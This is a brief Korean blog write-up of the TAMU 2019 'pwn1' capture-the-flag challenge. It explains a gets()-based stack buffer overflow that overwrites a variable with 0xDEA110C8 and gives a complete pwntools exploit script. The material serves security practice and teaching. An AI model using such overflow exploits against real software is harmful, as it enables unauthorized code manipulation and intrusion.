![[TAMU 2019] pwn1](https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbTTqED%2FbtqEv0nDyPR%2Fi0hoMkDrs8jhyuU8dwiC5K%2Fimg.png)
728x90
checksec
IDA로 pseudo code 확인
name, quest에 정답이 들어가도록 하고
gets(&s)을 이용해서 s에 dummy값을 넣어 overflow 시켜 v5의 값을 0xDEA110C8로 바꿈
./pwn1
대충 이런식으로 작동 >> name, quest를 위와 같이 입력해야 다음 진행 가능
문자열 s와 v5의 거리 = 0x3B-0x10
>> dummy값으로 채워주기
from pwn import *
p=process("./pwn1")
p.sendlineafter("What... is your name?","Sir Lancelot of Camelot")
p.sendlineafter("What... is your quest?","To seek the Holy Grail.")
pl="A"*(0x3B-0x10)
pl+=p32(0xDEA110C8)
p.recvuntil("What... is my secret?")
p.sendline(pl)
p.interactive()
SMALL
'System > PWNABLE' 카테고리의 다른 글
| shot (0) | 2020.06.01 |
|---|---|
| simpleRTL (0) | 2020.05.30 |
| RTL_x64 (0) | 2020.05.25 |
| [TAMU 2018] pwn4 (0) | 2020.05.24 |
| [HITCON] Training lab4 ret2libc (0) | 2020.05.24 |